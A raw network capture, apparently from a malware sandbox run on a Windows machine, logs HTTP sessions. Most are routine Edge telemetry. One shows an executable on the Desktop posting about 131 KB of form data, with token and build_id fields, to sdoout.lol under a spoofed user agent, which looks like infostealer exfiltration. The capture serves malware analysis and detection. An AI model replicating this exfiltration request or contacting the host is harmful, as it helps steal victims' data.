                                                                                                                                                                                                                                                                                          2024-12-30 14:55:39 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:39 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:39 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:39 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:40 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Mon, 30 Dec 2024 14:55:40 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          31192.168.2.953920108.139.47.334434108C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:39 UTC1012OUTGET /b2?rn=1735570536847&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=0D1D943A7B9D67B72691815F7AEF6664&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: sb.scorecardresearch.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                          Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                          Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                          Cookie: UID=199467e39237cba6052fa631735570538; XID=199467e39237cba6052fa631735570538
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:39 UTC326INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          Date: Mon, 30 Dec 2024 14:55:39 GMT
                                                                                                                                                                                                                                                                                          Accept-CH: UA, Platform, Arch, Model, Mobile
                                                                                                                                                                                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                                                                          Via: 1.1 694c2ab22098fd212b8d6808ee6c5aaa.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                          X-Amz-Cf-Pop: JFK50-P1
                                                                                                                                                                                                                                                                                          X-Amz-Cf-Id: tVf1sXk_pLX6J10PebK3KZcR0cFEE9PZcIx9UmHadS0dJ-JmUWHgQg==


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          32192.168.2.953928116.203.14.44437428C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:40 UTC278OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----2n7glxt2db1dje379hdj
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                                          Host: sdoout.lol
                                                                                                                                                                                                                                                                                          Content-Length: 131557
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:40 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 32 6e 37 67 6c 78 74 32 64 62 31 64 6a 65 33 37 39 68 64 6a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 66 34 39 31 31 31 32 61 62 62 66 33 35 64 37 64 35 34 64 62 66 32 62 38 39 65 62 31 31 30 38 0d 0a 2d 2d 2d 2d 2d 2d 32 6e 37 67 6c 78 74 32 64 62 31 64 6a 65 33 37 39 68 64 6a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 64 30 37 31 33 65 32 36 63 35 30 34 64 35 39 30 37 36 37 39 32 32 31 62 38 63 35 39 65 36 63 0d 0a 2d 2d 2d 2d 2d 2d 32 6e 37 67 6c 78 74 32 64 62 31 64 6a 65 33 37 39 68 64 6a 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------2n7glxt2db1dje379hdjContent-Disposition: form-data; name="token"9f491112abbf35d7d54dbf2b89eb1108------2n7glxt2db1dje379hdjContent-Disposition: form-data; name="build_id"cd0713e26c504d5907679221b8c59e6c------2n7glxt2db1dje379hdjCont
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:40 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:40 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:40 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:40 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:40 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:40 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:40 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:40 UTC717OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:41 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Mon, 30 Dec 2024 14:55:41 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:41 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          33192.168.2.95393520.110.205.1194434108C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:40 UTC1261OUTGET /c.gif?rnd=1735570536847&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=68ae4f54c4b54ec091b4e816c09ceaa4&activityId=68ae4f54c4b54ec091b4e816c09ceaa4&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=50901D4D6116491A952B6DE789F1FD6E&MUID=0D1D943A7B9D67B72691815F7AEF6664 HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: c.msn.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                          Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                          Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                          Cookie: USRLOC=; MUID=0D1D943A7B9D67B72691815F7AEF6664; _EDGE_S=F=1&SID=38B0BBDA67E56A6606D2AEBF66AE6B66; _EDGE_V=1; SM=T
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:40 UTC982INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Cache-Control: private, no-cache, proxy-revalidate, no-store
                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                          Content-Type: image/gif
                                                                                                                                                                                                                                                                                          Last-Modified: Tue, 10 Dec 2024 13:00:24 GMT
                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                          ETag: "9270eb7934bdb1:0"
                                                                                                                                                                                                                                                                                          Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                                                                          X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                          P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
